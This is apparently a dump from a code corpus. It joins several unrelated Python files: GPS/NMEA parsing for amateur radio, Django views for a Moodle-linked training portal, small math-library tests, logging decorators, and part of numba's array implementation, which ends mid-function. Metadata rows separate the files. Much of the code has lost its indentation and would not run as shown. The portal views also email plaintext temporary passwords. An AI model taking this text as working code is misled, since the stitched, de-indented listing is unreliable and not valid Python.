def get_image_url(self):
el = [ "key=%s" % self.key,
"center=%s" % self.center.coordinates(),
"size=400x400"]
mstr = "markers="
index = ord("a")
for m in self.markers:
mstr += "%s,blue%s|" % (m.coordinates(), chr(index))
index += 1
el.append(mstr)
return "http://maps.google.com/staticmap?%s" % ("&".join(el))
def station_table(self):
table = ""
index = ord('A')
for m in self.markers:
table += "<tr><td>%s</td><td>%s</td><td>%s</td>\n" % (\
chr(index),
m.station,
m.coordinates())
index += 1
return table
def make_html(self):
return """
<html>
<head>
<title>Known stations</title>
</head>
<body>
<h1> Known Stations </h1>
<img src="%s"/><br/><br/>
<table border="1">
%s
</table>
</body>
</html>
""" % (self.get_image_url(), self.station_table())
def display_in_browser(self):
f = tempfile.NamedTemporaryFile(suffix=".html")
name = f.name
f.close()
f = file(name, "w")
f.write(self.make_html())
f.flush()
f.close()
p = platform.get_platform()
p.open_html_file(f.name)
class GPSSource(object):
def __init__(self, port, rate=4800):
self.port = port
self.enabled = False
self.broken = None
try:
self.serial = serial.Serial(port=port, baudrate=rate, timeout=1)
except Exception, e:
print "Unable to open port `%s': %s" % (port, e)
self.broken = _("Unable to open GPS port")
self.thread = None
self.last_valid = False
self.position = GPSPosition()
def start(self):
if self.broken:
print "Not starting broken GPSSource"
return
self.invalid = 100
self.enabled = True
self.thread = threading.Thread(target=self.gpsthread)
self.thread.setDaemon(True)
self.thread.start()
def stop(self):
if self.thread and self.enabled:
self.enabled = False
self.thread.join()
self.serial.close()
def gpsthread(self):
while self.enabled:
data = self.serial.read(1024)
lines = data.split("\r\n")
for line in lines:
if line.startswith("$GPGGA") or \
line.startswith("$GPRMC"):
position = NMEAGPSPosition(line)
if position.valid and line.startswith("$GPRMC"):
self.invalid = 0
elif self.invalid < 10:
self.invalid += 1
if position.valid and self.position.valid:
self.position += position
print _("ME") + ": %s" % self.position
elif position.valid:
self.position = position
else:
print "Could not parse: %s" % line
def get_position(self):
return self.position
def status_string(self):
if self.broken:
return self.broken
elif self.invalid < 10 and self.position.satellites >= 3:
return _("GPS Locked") + " (%i sats)" % self.position.satellites
else:
return _("GPS Not Locked")
class NetworkGPSSource(GPSSource):
def __init__(self, port):
self.port = port
self.enabled = False
self.thread = None
self.position = GPSPosition()
self.last_valid = False
self.sock = None
self.broken = None
def start(self):
self.enabled = True
self.thread = threading.Thread(target=self.gpsthread)
self.thread.setDaemon(True)
self.thread.start()
def stop(self):
if self.thread and self.enabled:
self.enabled = False
self.thread.join()
def connect(self):
try:
_, host, port = self.port.split(":", 3)
port = int(port)
except ValueError, e:
print "Unable to parse %s (%s)" % (self.port, e)
self.broken = _("Unable to parse address")
return False
print "Connecting to %s:%i" % (host, port)
try:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((host, port))
self.sock.settimeout(10)
except Exception, e:
print "Unable to connect: %s" % e
self.broken = _("Unable to connect") + ": %s" % e
self.sock = None
return False
self.sock.send("r\n")
return True
def gpsthread(self):
while self.enabled:
if not self.sock:
if not self.connect():
time.sleep(1)
continue
try:
data = self.sock.recv(1024)
except Exception, e:
self.sock.close()
self.sock = None
print _("GPSd Socket closed")
continue
line = data.strip()
if not (line.startswith("$GPGGA") or \
line.startswith("$GPRMC")):
continue
pos = NMEAGPSPosition(line)
self.last_valid = pos.valid
if pos.valid and self.position.valid:
self.position += pos
elif pos.valid:
self.position = pos
else:
print "Could not parse: %s" % line
def get_position(self):
return self.position
def status_string(self):
if self.broken:
return self.broken
elif self.last_valid and self.position.satellites >= 3:
return _("GPSd Locked") + " (%i sats)" % self.position.satellites
else:
return _("GPSd Not Locked")
class StaticGPSSource(GPSSource):
def __init__(self, lat, lon, alt=0):
self.lat = lat
self.lon = lon
self.alt = alt
self.position = GPSPosition(self.lat, self.lon)
self.position.altitude = int(float(alt))
if EARTH_UNITS == "mi":
# This is kinda ugly, but assume we're given altitude in the same
# type of units as we've been asked to display
self.position.altitude = feet2meters(self.position.altitude)
def start(self):
pass
def stop(self):
pass
def get_position(self):
return self.position
def status_string(self):
return _("Static position")
def parse_GPS(string):
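    # scan the raw buffer for position sentences: a GPS-A ($$CRC) sentence is
    # returned directly, while NMEA ($GPGGA / $GPRMC) fixes are merged into one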
fixes = []
while "$" in string:
try:
if "$GPGGA" in string:
fixes.append(NMEAGPSPosition(string[string.index("$GPGGA"):]))
string = string[string.index("$GPGGA")+6:]
elif "$GPRMC" in string:
fixes.append(NMEAGPSPosition(string[string.index("$GPRMC"):]))
string = string[string.index("$GPRMC")+6:]
elif "$$CRC" in string:
return APRSGPSPosition(string[string.index("$$CRC"):])
else:
string = string[string.index("$")+1:]
except Exception, e:
print "Exception during GPS parse: %s" % e
string = string[string.index("$")+1:]
if not fixes:
return None
fix = fixes[0]
fixes = fixes[1:]
for extra in fixes:
print "Appending fix: %s" % extra
fix += extra
return fix
if __name__ == "__main__":
nmea_strings = [
"$GPRMC,010922,A,4603.6695,N,07307.3033,W,0.6,66.8,060508,16.1,W,A*1D\r\nVE2SE 9,MV [email protected]*32",
"$GPGGA,203008.78,4524.9729,N,12246.9580,W,1,03,3.8,00133,M,,,,*39",
"$GPGGA,183324.518,4533.0875,N,12254.5939,W,2,04,3.4,48.6,M,-19.6,M,1.2,0000*74",
"$GPRMC,215348,A,4529.3672,N,12253.2060,W,0.0,353.8,030508,17.5,E,D*3C",
"$GPGGA,075519,4531.254,N,12259.400,W,1,3,0,0.0,M,0,M,,*55\r\nK7HIO ,GPS Info",
"$GPRMC,074919.04,A,4524.9698,N,12246.9520,W,00.0,000.0,260508,19.,E*79",
"$GPRMC,123449.089,A,3405.1123,N,08436.4301,W,000.0,000.0,021208,,,A*71",
"$GPRMC,123449.089,A,3405.1123,N,08436.4301,W,000.0,000.0,021208,,,A*71\r\nKK7DS M,LJ DAN*C",
"$GPRMC,230710,A,2748.1414,N,08238.5556,W,000.0,033.1,111208,004.3,W*77",
]
print "-- NMEA --"
for s in nmea_strings:
p = NMEAGPSPosition(s)
if p.valid:
print "Pass: %s" % str(p)
else:
print "** FAIL: %s" % s
aprs_strings = [
"$$CRCCE3E,AE5PL-T>API282,DSTAR*:!3302.39N/09644.66W>/\r",
"$$CRC1F72,KI4IFW-1>APRATS,DSTAR*:@291930/4531.50N/12254.98W>APRS test beacon /A=000022",
"$$CRC80C3,VA2PBI>APU25N,DSTAR*:=4539.33N/07330.28W-73 de Pierre D-Star Montreal {UIV32N}",
"$$CRCA31F,VA2PBI>API282,DSTAR*:/221812z4526.56N07302.34W/\r",
'$$CRCF471,AB9FT-ML>APRATS,DSTAR*:@214235h0.00S/00000.00W>ON D-RATS at Work\r',
]
print "\n-- GPS-A --"
for s in aprs_strings:
p = APRSGPSPosition(s)
if p.valid:
print "Pass: %s" % str(p)
else:
print "** FAIL: %s" % s
| gpl-3.0 | 4,689,796,423,073,490,000 | 28.063158 | 111 | 0.489165 | false | 3.367758 | false | false | false |
kirti3192/spoken-website | mdldjango/views.py | 1 | 15036 | from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from django.core.context_processors import csrf
from models import MdlUser
from events.models import TrainingAttendance
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from forms import *
from django.contrib import messages
import xml.etree.cElementTree as etree
from xml.etree.ElementTree import ElementTree
# Create your views here.
import hashlib
import csv, os, time
import random
import string
from django.core.exceptions import PermissionDenied
from events.views import *
from events.models import *
from django.conf import settings
from events.forms import OrganiserForm
from django.core.mail import EmailMultiAlternatives
from validate_email import validate_email
from get_or_create_participant import get_or_create_participant, encript_password, check_csvfile
def authenticate(username = None, password = None):
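    # manual authentication against the Moodle user table: hash the supplied
    # password and compare it with the stored hash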
try:
#print " i am in moodle auth"
user = MdlUser.objects.get(username=username)
#print user
pwd = user.password
p = encript_password(password)
pwd_valid = (pwd == p)
#print pwd
#print "------------"
if user and pwd_valid:
return user
except Exception, e:
#print e
#print "except ---"
return None
def mdl_logout(request):
if 'mdluserid' in request.session:
del request.session['mdluserid']
request.session.save()
#print "logout !!"
return HttpResponseRedirect('/participant/login')
def mdl_login(request):
messages = {}
if request.POST:
username = request.POST["username"]
password = request.POST["password"]
if not username or not password:
messages['error'] = "Please enter valide Username and Password!"
#return HttpResponseRedirect('/participant/login')
user = authenticate(username = username, password = password)
if user:
request.session['mdluserid'] = user.id
request.session['mdluseremail'] = user.email
request.session['mdlusername'] = user.username
request.session['mdluserinstitution'] = user.institution
request.session.save()
request.session.modified = True
else:
messages['error'] = "Username or Password Doesn't match!"
if request.session.get('mdluserid'):
#print "Current user is ", request.session.get('mdluserid')
return HttpResponseRedirect('/participant/index')
context = {'message':messages}
context.update(csrf(request))
return render(request, 'mdl/templates/mdluser_login.html', context)
def index(request):
mdluserid = request.session.get('mdluserid')
mdlusername = request.session.get('mdlusername')
if not mdluserid:
return HttpResponseRedirect('/participant/login')
try:
mdluser = MdlUser.objects.get(id=mdluserid)
except:
return HttpResponseRedirect('/participant/login')
if str(mdluser.institution).isdigit():
academic = None
try:
academic = AcademicCenter.objects.get(id = mdluser.institution)
except:
pass
if academic:
category = int(request.GET.get('category', 4))
if not (category > 0 and category < 6):
return HttpResponseRedirect('/participant/index/?category=4')
upcoming_workshop = None
upcoming_test = None
past_workshop = None
past_test = None
ongoing_test = None
if category == 3:
upcoming_workshop = Training.objects.filter((Q(status = 0) | Q(status = 1) | Q(status = 2) | Q(status = 3)), academic_id=mdluser.institution, tdate__gte=datetime.date.today()).order_by('-tdate')
if category == 5:
upcoming_test = Test.objects.filter(status=2, academic_id=mdluser.institution, tdate__gt=datetime.date.today()).order_by('-tdate')
if category == 1:
past_workshop = Training.objects.filter(id__in = TrainingAttendance.objects.filter(mdluser_id = mdluser.id).values_list('training_id'), status = 4).order_by('-tdate')
if category == 2:
past_test = Test.objects.filter(id__in = TestAttendance.objects.filter(mdluser_id = mdluser.id).values_list('test_id'), status = 4).order_by('-tdate')
if category == 4:
ongoing_test = Test.objects.filter(status=3, academic_id=mdluser.institution, tdate = datetime.date.today()).order_by('-tdate')
print past_workshop, "******************8"
context = {
'mdluserid' : mdluserid,
'mdlusername' : mdlusername,
'upcoming_workshop' : upcoming_workshop,
'upcoming_test' : upcoming_test,
'past_workshop' : past_workshop,
'past_test' : past_test,
'ongoing_test' : ongoing_test,
'category' : category,
'ONLINE_TEST_URL' : settings.ONLINE_TEST_URL
}
context.update(csrf(request))
return render(request, 'mdl/templates/mdluser_index.html', context)
form = OrganiserForm()
if request.method == 'POST':
form = OrganiserForm(request.POST)
if form.is_valid():
mdluser.institution = form.cleaned_data['college']
mdluser.save()
return HttpResponseRedirect('/participant/index')
context = {
'form' : form
}
context.update(csrf(request))
return render(request, 'mdl/templates/academic.html', context)
@login_required
def offline_details(request, wid, category):
user = request.user
wid = int(wid)
category = int(category)
#print category
user = request.user
form = OfflineDataForm()
try:
if category == 1:
Training.objects.get(pk=wid, status__lt=4)
elif category == 2:
Training.objects.get(pk=wid, status__lt=4)
else:
raise PermissionDenied('You are not allowed to view this page!')
except Exception, e:
raise PermissionDenied('You are not allowed to view this page!')
if request.method == 'POST':
form = OfflineDataForm(request.POST, request.FILES)
try:
if category == 1:
w = Training.objects.get(id = wid)
elif category == 2:
w = Training.objects.get(id = wid)
else:
raise PermissionDenied('You are not allowed to view this page!')
except:
raise PermissionDenied('You are not allowed to view this page!')
if form.is_valid():
file_path = settings.MEDIA_ROOT + 'training/' + str(wid) + str(time.time())
f = request.FILES['xml_file']
fout = open(file_path, 'wb+')
for chunk in f.chunks():
fout.write(chunk)
fout.close()
error_line_no = ''
csv_file_error = 0
csv_file_error, error_line_no = check_csvfile(user, file_path, w, flag=1)
os.unlink(file_path)
#update participant count
update_participants_count(w)
if error_line_no:
messages.error(request, error_line_no)
#update logs
if category == 1:
                message = w.academic.institution_name+" has submitted Offline "+w.foss.foss+" workshop attendance dated "+w.tdate.strftime("%Y-%m-%d")
update_events_log(user_id = user.id, role = 2, category = 0, category_id = w.id, academic = w.academic_id, status = 5)
update_events_notification(user_id = user.id, role = 2, category = 0, category_id = w.id, academic = w.academic_id, status = 5, message = message)
if not error_line_no:
messages.success(request, "Thank you for uploading the Attendance. Now make sure that you cross check and verify the details before submiting.")
return HttpResponseRedirect('/software-training/workshop/'+str(wid)+'/attendance/')
else:
                message = w.academic.institution_name+" has submitted Offline training attendance."
update_events_log(user_id = user.id, role = 2, category = 2, category_id = w.id, academic = w.academic_id, status = 5)
update_events_notification(user_id = user.id, role = 2, category = 2, category_id = w.id, academic = w.academic_id, status = 5, message = message)
if not error_line_no:
messages.success(request, "Thank you for uploading the Attendance. Now make sure that you cross check and verify the details before submiting.")
return HttpResponseRedirect('/software-training/training/'+str(wid)+'/attendance/')
messages.error(request, "Please Upload CSV file !")
context = {
'form': form,
}
messages.info(request, """
Please upload the CSV file which you have generated.
To know more <a href="http://process.spoken-tutorial.org/images/9/96/Upload_Attendance.pdf" target="_blank">Click here</a>.
""")
context.update(csrf(request))
return render(request, 'mdl/templates/offline_details.html', context)
def mdl_register(request):
form = RegisterForm()
if request.method == "POST":
form = RegisterForm(request.POST)
#Email exits
try:
user = MdlUser.objects.filter(email=request.POST['email']).first()
if user:
messages.success(request, "Email : "+request.POST['email']+" already registered on this website. Please click <a href='http://www.spoken-tutorial.org/participant/login/'>here </a>to login")
except Exception, e:
#print e
pass
if form.is_valid():
mdluser = MdlUser()
mdluser.auth = 'manual'
mdluser.institution = form.cleaned_data['college']
mdluser.gender = form.cleaned_data['gender']
mdluser.firstname = form.cleaned_data['firstname']
mdluser.lastname = form.cleaned_data['lastname']
mdluser.email = form.cleaned_data['email']
mdluser.username = form.cleaned_data['username']
mdluser.password = encript_password(form.cleaned_data['password'])
mdluser.confirmed = 1
mdluser.mnethostid = 1
mdluser.save()
messages.success(request, "User " + form.cleaned_data['firstname'] +" "+form.cleaned_data['lastname']+" Created!")
return HttpResponseRedirect('/participant/register/')
context = {}
context['form'] = form
context.update(csrf(request))
return render(request, 'mdl/templates/register.html', context)
def feedback(request, wid):
mdluserid = request.session.get('mdluserid')
mdlusername = request.session.get('mdlusername')
if not mdluserid:
return HttpResponseRedirect('/participant/login')
form = FeedbackForm()
mdluserid = request.session.get('mdluserid')
if not mdluserid:
return HttpResponseRedirect('/participant/login')
w = None
try:
w = Training.objects.select_related().get(pk=wid)
		# Check if feedback already exists
TrainingFeedback.objects.get(training_id = wid, mdluser_id = mdluserid)
messages.success(request, "We have already received your feedback. ")
return HttpResponseRedirect('/participant/index/?category=1')
	except Exception as e:
#print e
pass
if request.method == 'POST':
form = FeedbackForm(request.POST)
if form.is_valid():
try:
form_data = form.save(commit=False)
form_data.training_id = wid
form_data.mdluser_id = mdluserid
form_data.save()
try:
wa = TrainingAttendance.objects.get(mdluser_id=mdluserid, training_id = wid)
wa.status = 2
wa.save()
except:
wa = TrainingAttendance()
wa.training_id = wid
wa.mdluser_id = mdluserid
wa.status = 1
wa.save()
messages.success(request, "Thank you for your valuable feedback.")
return HttpResponseRedirect('/participant/index/?category=1')
			except Exception as e:
				print(e)
pass
#return HttpResponseRedirect('/participant/index/')
context = {
'form' : form,
'w' : w,
'mdluserid' : mdluserid,
'mdlusername' : mdlusername,
}
context.update(csrf(request))
return render(request, 'mdl/templates/feedback.html', context)
def forget_password(request):
context = {}
form = PasswordResetForm()
if request.method == "POST":
form = PasswordResetForm(request.POST)
if form.is_valid():
password_string = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))
user = MdlUser.objects.filter(email=request.POST['email']).first()
password_encript = encript_password(password_string)
user.password = password_encript
user.save()
subject = "Spoken Tutorial Online Test password reset"
to = [user.email]
message = '''Hi {0},
Your account password at 'Spoken Tutorials Online Test Center' has been reset
and you have been issued with a new temporary password.
Your current login information is now:
username: {1}
password: {2}
Please go to this page to change your password:
{3}
In most mail programs, this should appear as a blue link
which you can just click on. If that doesn't work,
then cut and paste the address into the address
line at the top of your web browser window.
Cheers from the 'Spoken Tutorials Online Test Center' administrator,
Admin Spoken Tutorials
'''.format(user.firstname, user.username, password_string, 'http://onlinetest.spoken-tutorial.org/login/change_password.php')
# send email
email = EmailMultiAlternatives(
subject, message, '[email protected]',
to = to, bcc = [], cc = [],
headers={'Reply-To': '[email protected]', "Content-type":"text/html;charset=iso-8859-1"}
)
result = email.send(fail_silently=False)
messages.success(request, "New password sent to your email "+user.email)
return HttpResponseRedirect('/participant/login/')
context = {
'form': form
}
context.update(csrf(request))
return render(request, 'mdl/templates/password_reset.html', context)
| gpl-3.0 | 2,444,503,224,367,037,000 | 41.235955 | 210 | 0.60415 | false | 4.061588 | true | false | false |
IngenuityEngine/arkMath | test/test_helpers.py | 1 | 2374 |
# Standard modules
from expects import *
# Our modules
import arkInit
arkInit.init()
import tryout
import arkMath
from arkMath import Mat44
class test(tryout.TestSuite):
title = 'test/test_helpers.py'
def is_vector(self):
vec = arkMath.Vec(1,2,3,4)
self.assertEqual(arkMath.isVector(vec), True)
self.assertEqual(arkMath.isVector(12), False)
def ensure_vector(self):
vec = arkMath.Vec(1,2,3,4)
ensured = arkMath.ensureVector(vec)
self.assertEqual(ensured.x, vec.x)
ensured = arkMath.ensureVector(12)
self.assertEqual(ensured.x, 12)
self.assertEqual(ensured.y, 0)
ensured = arkMath.ensureVector(12, 5, 4, 9)
self.assertEqual(ensured.x, 12)
self.assertEqual(ensured.y, 5)
self.assertEqual(ensured.z, 4)
self.assertEqual(ensured.w, 9)
ensured = arkMath.ensureVector([15, 25, 7, 2])
self.assertEqual(ensured.x, 15)
self.assertEqual(ensured.y, 25)
self.assertEqual(ensured.z, 7)
self.assertEqual(ensured.w, 2)
def is_matrix(self):
matList = [1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0]
matFromList = Mat44(matList)
vec1 = arkMath.Vec(1.0, 0.0, 0.0, 0.0)
vec2 = arkMath.Vec(0.0, 1.0, 0.0, 0.0)
vec3 = arkMath.Vec(0.0, 0.0, 1.0, 0.0)
vec4 = arkMath.Vec(0.0, 0.0, 0.0, 1.0)
matFromVecs = Mat44(vec1, vec2, vec3, vec4)
justVec = arkMath.Vec(1, 2, 3, 4)
self.assertEqual(arkMath.isMatrix(matFromList), True)
self.assertEqual(arkMath.isMatrix(matFromVecs), True)
self.assertEqual(arkMath.isMatrix(justVec), False)
	# Should work if the input is already a matrix, 4 vectors, or 16 matrix values
def ensure_matrix(self):
matList = [1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0]
goalMat = Mat44(matList)
sixteenMat = arkMath.ensureMatrix(1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0)
self.assertEqual(type(sixteenMat), type(goalMat))
vec1 = arkMath.Vec(1.0, 0.0, 0.0, 0.0)
vec2 = arkMath.Vec(0.0, 1.0, 0.0, 0.0)
vec3 = arkMath.Vec(0.0, 0.0, 1.0, 0.0)
vec4 = arkMath.Vec(0.0, 0.0, 0.0, 1.0)
vecsMat = arkMath.ensureMatrix(vec1, vec2, vec3, vec4)
self.assertEqual(type(vecsMat), type(goalMat))
		# ensureMatrix of an existing matrix should just return itself
selfMat = arkMath.ensureMatrix(goalMat)
self.assertEqual(type(selfMat), type(goalMat))
if __name__ == '__main__':
tryout.run(test)
| mit | 8,659,748,860,809,815,000 | 29.831169 | 115 | 0.667228 | false | 2.212488 | false | false | false |
leingang/plg | plg/utils/decorators.py | 1 | 1819 | #!/usr/bin/env python
import logging
def debug_entry(f):
"""
debug the entry into a function
>>> import sys
>>> import logging
The stream configuration is just to make doctests work.
In practice, you'd probably want the default stream sys.stderr.
>>> logging.basicConfig(level=logging.DEBUG,stream=sys.stdout)
>>> @debug_entry
... def f(x):
... return x*x
...
>>> f(2)
DEBUG:f:Entering: arguments=(2,), keyword arguments={}
4
"""
def new_f(*args,**kwargs):
logger=logging.getLogger(f.__name__)
logger.debug("Entering: arguments=%s, keyword arguments=%s",args,kwargs)
return f(*args,**kwargs)
new_f.__name__ = f.__name__
return new_f
def debug_result(f):
"""
Debug the result of a function
>>> import sys
>>> import logging
>>> logging.basicConfig(level=logging.DEBUG,stream=sys.stdout)
>>> @debug_result
... def f(x):
... return x*x
...
>>> f(2)+10
DEBUG:f:Result: 4
14
Decorators can be chained (that's kind of the point!).
>>> @debug_entry
... @debug_result
... def g(x):
... return 2*x
...
>>> g(3)+17
DEBUG:g:Entering: arguments=(3,), keyword arguments={}
DEBUG:g:Result: 6
23
"""
def new_f(*args,**kwargs):
logger=logging.getLogger(f.__name__)
result=f(*args,**kwargs)
logger.debug("Result: %s",repr(result))
return result
new_f.__name__ = f.__name__
return new_f
if __name__ == "__main__":
import doctest
doctest.testmod()
# from decorators import *
# import logging
# logging.basicConfig(level=logging.DEBUG)
# @debug_result
# @debug_entry
# def f(x):
# return x*x
#
#f(2) | gpl-3.0 | 2,352,242,054,812,354,000 | 22.333333 | 80 | 0.548103 | false | 3.674747 | false | false | false |
pitrou/numba | numba/targets/arrayobj.py | 1 | 109012 | """
Implementation of operations on Array objects and objects supporting
the buffer protocol.
"""
from __future__ import print_function, absolute_import, division
import math
import llvmlite.llvmpy.core as lc
from llvmlite.llvmpy.core import Constant
import numpy
from numba import types, cgutils, typing
from numba.numpy_support import as_dtype
from numba.numpy_support import version as numpy_version
from numba.targets.imputils import (builtin, builtin_attr, implement,
impl_attribute, impl_attribute_generic,
iternext_impl, impl_ret_borrowed,
impl_ret_new_ref, impl_ret_untracked)
from numba.typing import signature
from . import quicksort, slicing
def increment_index(builder, val):
"""
Increment an index *val*.
"""
one = Constant.int(val.type, 1)
# We pass the "nsw" flag in the hope that LLVM understands the index
# never changes sign. Unfortunately this doesn't always work
# (e.g. ndindex()).
return builder.add(val, one, flags=['nsw'])
def set_range_metadata(builder, load, lower_bound, upper_bound):
"""
Set the "range" metadata on a load instruction.
Note the interval is in the form [lower_bound, upper_bound).
"""
range_operands = [Constant.int(load.type, lower_bound),
Constant.int(load.type, upper_bound)]
md = builder.module.add_metadata(range_operands)
load.set_metadata("range", md)
def mark_positive(builder, load):
"""
Mark the result of a load instruction as positive (or zero).
"""
upper_bound = (1 << (load.type.width - 1)) - 1
set_range_metadata(builder, load, 0, upper_bound)
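# As a rough illustration (assuming a 64-bit index load), the effect of
# mark_positive() is a range annotation on the load, along the lines of:
#
#   %dim = load i64, i64* %ptr, !range !0
#   !0 = !{i64 0, i64 9223372036854775807}
#
# i.e. the half-open interval [0, 2**63 - 1), which tells LLVM the loaded
# dimension can never be negative.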
def make_array(array_type):
"""
Return the Structure representation of the given *array_type*
(an instance of types.Array).
"""
base = cgutils.create_struct_proxy(array_type)
ndim = array_type.ndim
class ArrayStruct(base):
@property
def shape(self):
"""
Override .shape to inform LLVM that its elements are all positive.
"""
builder = self._builder
if ndim == 0:
return base.__getattr__(self, "shape")
# Unfortunately, we can't use llvm.assume as its presence can
# seriously pessimize performance,
# *and* the range metadata currently isn't improving anything here,
# see https://llvm.org/bugs/show_bug.cgi?id=23848 !
ptr = self._get_ptr_by_name("shape")
dims = []
for i in range(ndim):
dimptr = cgutils.gep_inbounds(builder, ptr, 0, i)
load = builder.load(dimptr)
dims.append(load)
mark_positive(builder, load)
return cgutils.pack_array(builder, dims)
return ArrayStruct
def get_itemsize(context, array_type):
"""
Return the item size for the given array or buffer type.
"""
llty = context.get_data_type(array_type.dtype)
return context.get_abi_sizeof(llty)
def load_item(context, builder, arrayty, ptr):
"""
Load the item at the given array pointer.
"""
align = None if arrayty.aligned else 1
return context.unpack_value(builder, arrayty.dtype, ptr,
align=align)
def store_item(context, builder, arrayty, val, ptr):
"""
Store the item at the given array pointer.
"""
align = None if arrayty.aligned else 1
return context.pack_value(builder, arrayty.dtype, val, ptr, align=align)
def fix_integer_index(context, builder, idxty, idx, size):
"""
Fix the integer index' type and value for the given dimension size.
"""
if idxty.signed:
ind = context.cast(builder, idx, idxty, types.intp)
ind = slicing.fix_index(builder, ind, size)
else:
ind = context.cast(builder, idx, idxty, types.uintp)
return ind
def populate_array(array, data, shape, strides, itemsize, meminfo,
parent=None):
"""
Helper function for populating array structures.
This avoids forgetting to set fields.
*shape* and *strides* can be Python tuples or LLVM arrays.
"""
context = array._context
builder = array._builder
datamodel = array._datamodel
required_fields = set(datamodel._fields)
if meminfo is None:
meminfo = Constant.null(context.get_value_type(
datamodel.get_type('meminfo')))
intp_t = context.get_value_type(types.intp)
if isinstance(shape, (tuple, list)):
shape = cgutils.pack_array(builder, shape, intp_t)
if isinstance(strides, (tuple, list)):
strides = cgutils.pack_array(builder, strides, intp_t)
attrs = dict(shape=shape,
strides=strides,
data=data,
itemsize=itemsize,
meminfo=meminfo,)
# Set `parent` attribute
if parent is None:
attrs['parent'] = Constant.null(context.get_value_type(
datamodel.get_type('parent')))
else:
attrs['parent'] = parent
# Calc num of items from shape
nitems = context.get_constant(types.intp, 1)
unpacked_shape = cgutils.unpack_tuple(builder, shape, shape.type.count)
if unpacked_shape:
# Shape is not empty
for axlen in unpacked_shape:
nitems = builder.mul(nitems, axlen)
else:
# Shape is empty
nitems = context.get_constant(types.intp, 1)
attrs['nitems'] = nitems
# Make sure that we have all the fields
got_fields = set(attrs.keys())
if got_fields != required_fields:
raise ValueError("missing {0}".format(required_fields - got_fields))
# Set field value
for k, v in attrs.items():
setattr(array, k, v)
return array
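# A minimal usage sketch (mirroring make_view() and array_T() below): create an
# empty struct with make_array() and fill every field in a single call so that
# none of them is forgotten:
#
#   ret = make_array(retty)(context, builder)
#   populate_array(ret,
#                  data=ary.data,
#                  shape=cgutils.pack_array(builder, shapes),
#                  strides=cgutils.pack_array(builder, strides),
#                  itemsize=ary.itemsize,
#                  meminfo=ary.meminfo,
#                  parent=ary.parent)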
def update_array_info(aryty, array):
"""
Update some auxiliary information in *array* after some of its fields
were changed. `itemsize` and `nitems` are updated.
"""
context = array._context
builder = array._builder
# Calc num of items from shape
nitems = context.get_constant(types.intp, 1)
unpacked_shape = cgutils.unpack_tuple(builder, array.shape, aryty.ndim)
for axlen in unpacked_shape:
nitems = builder.mul(nitems, axlen)
array.nitems = nitems
array.itemsize = context.get_constant(types.intp,
get_itemsize(context, aryty))
def make_arrayiter_cls(iterator_type):
"""
Return the Structure representation of the given *iterator_type* (an
instance of types.ArrayIteratorType).
"""
return cgutils.create_struct_proxy(iterator_type)
@builtin
@implement('getiter', types.Kind(types.Buffer))
def getiter_array(context, builder, sig, args):
[arrayty] = sig.args
[array] = args
iterobj = make_arrayiter_cls(sig.return_type)(context, builder)
zero = context.get_constant(types.intp, 0)
indexptr = cgutils.alloca_once_value(builder, zero)
iterobj.index = indexptr
iterobj.array = array
# Incref array
if context.enable_nrt:
context.nrt_incref(builder, arrayty, array)
res = iterobj._getvalue()
# Note: a decref on the iterator will dereference all internal MemInfo*
out = impl_ret_new_ref(context, builder, sig.return_type, res)
return out
def _getitem_array1d(context, builder, arrayty, array, idx, wraparound):
"""
Look up and return an element from a 1D array.
"""
ptr = cgutils.get_item_pointer(builder, arrayty, array, [idx],
wraparound=wraparound)
return load_item(context, builder, arrayty, ptr)
@builtin
@implement('iternext', types.Kind(types.ArrayIterator))
@iternext_impl
def iternext_array(context, builder, sig, args, result):
[iterty] = sig.args
[iter] = args
arrayty = iterty.array_type
if arrayty.ndim != 1:
# TODO
raise NotImplementedError("iterating over %dD array" % arrayty.ndim)
iterobj = make_arrayiter_cls(iterty)(context, builder, value=iter)
ary = make_array(arrayty)(context, builder, value=iterobj.array)
nitems, = cgutils.unpack_tuple(builder, ary.shape, count=1)
index = builder.load(iterobj.index)
is_valid = builder.icmp(lc.ICMP_SLT, index, nitems)
result.set_valid(is_valid)
with builder.if_then(is_valid):
value = _getitem_array1d(context, builder, arrayty, ary, index,
wraparound=False)
result.yield_(value)
nindex = builder.add(index, context.get_constant(types.intp, 1))
builder.store(nindex, iterobj.index)
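# Note: only 1d arrays are handled by the iterator above.  A nopython-mode loop
# such as `for v in a` (with `a` a 1d array) lowers to getiter_array() followed
# by repeated iternext_array() calls, yielding the items in index order.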
#-------------------------------------------------------------------------------
# Basic indexing (with integers and slices only)
def basic_indexing(context, builder, aryty, ary, index_types, indices):
"""
Perform basic indexing on the given array.
A (data pointer, shapes, strides) tuple is returned describing
the corresponding view.
"""
zero = context.get_constant(types.intp, 0)
shapes = cgutils.unpack_tuple(builder, ary.shape, aryty.ndim)
strides = cgutils.unpack_tuple(builder, ary.strides, aryty.ndim)
output_indices = []
output_shapes = []
output_strides = []
ax = 0
for indexval, idxty in zip(indices, index_types):
if idxty is types.ellipsis:
# Fill up missing dimensions at the middle
n_missing = aryty.ndim - len(indices) + 1
for i in range(n_missing):
output_indices.append(zero)
output_shapes.append(shapes[ax])
output_strides.append(strides[ax])
ax += 1
continue
# Regular index value
if idxty == types.slice3_type:
slice = slicing.Slice(context, builder, value=indexval)
cgutils.guard_invalid_slice(context, builder, slice)
slicing.fix_slice(builder, slice, shapes[ax])
output_indices.append(slice.start)
sh = slicing.get_slice_length(builder, slice)
st = slicing.fix_stride(builder, slice, strides[ax])
output_shapes.append(sh)
output_strides.append(st)
elif isinstance(idxty, types.Integer):
ind = fix_integer_index(context, builder, idxty, indexval,
shapes[ax])
output_indices.append(ind)
else:
raise NotImplementedError("unexpected index type: %s" % (idxty,))
ax += 1
# Fill up missing dimensions at the end
assert ax <= aryty.ndim
while ax < aryty.ndim:
output_shapes.append(shapes[ax])
output_strides.append(strides[ax])
ax += 1
# No need to check wraparound, as negative indices were already
# fixed in the loop above.
